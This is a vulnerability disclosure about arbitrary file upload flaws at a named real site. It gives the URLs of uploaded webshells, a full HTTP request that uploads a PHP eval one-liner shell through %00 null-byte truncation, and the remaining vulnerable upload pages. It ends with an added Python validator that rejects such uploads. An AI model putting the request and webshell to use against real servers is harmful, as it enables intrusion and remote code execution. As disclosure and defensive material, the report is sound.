Arbitrary file upload at a certain company; a second upload page has a spoofed-upload vulnerability (%00 truncation). The spoofed upload does not return a path, but checking through the shell uploaded earlier confirmed that the file had indeed been written. Upload page that returns the upload path:
http://zt.happigo.com/sc/d/xiangjijie/post_pic.php#upload_
Uploaded shell:
http://zt.happigo.com/sc/d/xiangjijie/uploads/2012/08/20/dc3fbca363fe2a1aaf08b38e2833f403.php
The other page accepts uploads via %00 truncation but does not return the upload path; looking in the upload directory confirmed the file was there.
POST /sc/d/gougoukeaixiu/action.php?method=upload HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://zt.happigo.com/sc/d/gougoukeaixiu/index.php?result=success
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7dc31fc170554
Accept-Encoding: gzip, deflate
Host: zt.happigo.com
Content-Length: 1600
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [cookies]

-----------------------------7dc31fc170554
Content-Disposition: form-data; name="fileField"; filename="3.php"
Content-Type: image/pjpeg

<?php @eval($_REQUEST['ok']);?>
-----------------------------7dc31fc170554
Content-Disposition: form-data; name="title"

OK
-----------------------------7dc31fc170554--

The uploaded shell:
Other upload pages that do not return the path:
http://zt.happigo.com/sc/d/apply100930/upload.html
http://zt.happigo.com/sc/d/gougoukeaixiu/index.php
Fix: validate uploaded files on the server side. Note: your company should also review the upload pages under every subfolder of the web root.
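As an added illustration of the server-side check the fix recommends (example code written for this page, not the report's or the site's own code), the Python validator below rejects a filename containing a NUL or other control byte outright, whitelists the final extension, and checks the file's leading bytes against the type that extension claims; the stored name is chosen by the server, so the client's filename never reaches the filesystem. The extension/magic table and the function names are assumptions of this example.

```python
import os
import secrets
from typing import Optional, Tuple

# Allowed extensions and the magic-byte prefixes each one must carry.
# (Table constructed for this example; extend it to what the site really accepts.)
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (ok, ext_or_reason).

    Every check runs on the complete string the client sent, so a NUL byte
    or a double extension cannot make the name look like one type to the
    check and another to the filesystem.
    """
    # 1. Reject control characters. A NUL is what lets "3.php\x00.jpg" pass a
    #    string-based extension check while a C-level file API stops at the
    #    NUL and writes "3.php" (the %00 truncation the report describes).
    if any(ord(c) < 0x20 or c == "\x7f" for c in filename):
        return False, "control character in filename"

    # 2. Keep only the basename; directory components are never trusted.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base in (".", ".."):
        return False, "empty or dot filename"

    # 3. Whitelist the LAST extension, lower-cased ("3.php.jpg" is judged as jpg,
    #    and step 4 then requires the bytes to actually be a JPEG).
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        return False, "extension not allowed: " + repr(ext)

    # 4. The content must match the claimed type. The client-supplied
    #    Content-Type header (image/pjpeg in the report) is ignored entirely.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match extension"

    return True, ext


def stored_name(ext: str) -> str:
    """Server-chosen name: random hex plus the validated extension."""
    return secrets.token_hex(16) + "." + ext


def save_upload(filename: str, data: bytes, upload_dir: str) -> Optional[str]:
    """Validate, then write under a server-chosen name. Returns that name or None."""
    ok, info = validate_upload(filename, data)
    if not ok:
        return None
    name = stored_name(info)
    with open(os.path.join(upload_dir, name), "wb") as fh:
        fh.write(data)
    return name


if __name__ == "__main__":
    # Constructed sample inputs, modelled on the request in the report.
    for name, body in [
        ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
        ("3.php", b"<?php echo 1; ?>"),
        ("3.php\x00.jpg", b"\xff\xd8\xff\xe0"),
        ("3.jpg", b"<?php echo 1; ?>"),
    ]:
        print(repr(name), validate_upload(name, body))
```

The order of the checks matters: the NUL test comes first because, in PHP versions before 5.3.4, string functions saw the whole `3.php\x00.jpg` while the file-writing call stopped at the NUL, which is exactly the gap between "the check passed" and "3.php appeared on disk". Storing files under a random server-chosen name, in a directory where the web server does not execute scripts, closes the remaining cases even if a validator bug slips through.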